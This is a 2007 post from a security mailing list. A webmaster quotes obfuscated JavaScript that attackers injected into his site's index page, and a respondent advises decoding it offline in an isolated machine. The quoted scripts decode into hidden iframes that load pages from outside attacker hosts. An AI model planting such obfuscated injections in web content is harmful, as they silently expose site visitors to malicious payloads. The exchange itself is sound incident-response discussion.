[Dshield] Need help decoding hackers javascript code

Brent Gardner brent.gardner at gmail.com
Tue Sep 4 17:58:50 GMT 2007


Steve West wrote:
> Hi,
> 
> Just found some hackers who have replaced the index.html with the 
> following code below. I'm wondering if anyone knows of a tool I can use 
> to safely decode the following:
> 
> <meta name="robots" content="all" /><SCRIPT LANGUAGE="JavaScript">
> <!--
> function Decode(){var temp="",i,c=0,out="";var 
> str="60!105!102!114!97!109!101!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!32!98!111!114!100!101!114!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!115!114!99!61!39!104!116!116!112!58!47!47!98!101!110!115!97!120!46!105!110!102!111!47!105!110!100!101!120!50!46!104!116!109!108!39!62!60!47!105!102!114!97!109!101!62!13!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
> //-->
> </SCRIPT><SCRIPT LANGUAGE="JavaScript">
> <!--
> Decode();
> //-->
> </SCRIPT>
> <meta name="revisit-after" content="1 days" /><script 
> type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u007a\u006c\u006f\u002d\u0078\u002e\u006e\u0065\u0074\u002f\u0058\u0044\u0053\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u0020\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
> 
> --
> thx,
> 
> SW
> 

I don't know enough JavaScript to tell you exactly, but all you have to 
do is change the document.write calls to something that will send output 
to a local text file.

For ultimate safety I recommend doing this on a disconnected machine 
that you don't care about, or in a locked down virtual machine.


Brent Gardner





More information about the list mailing list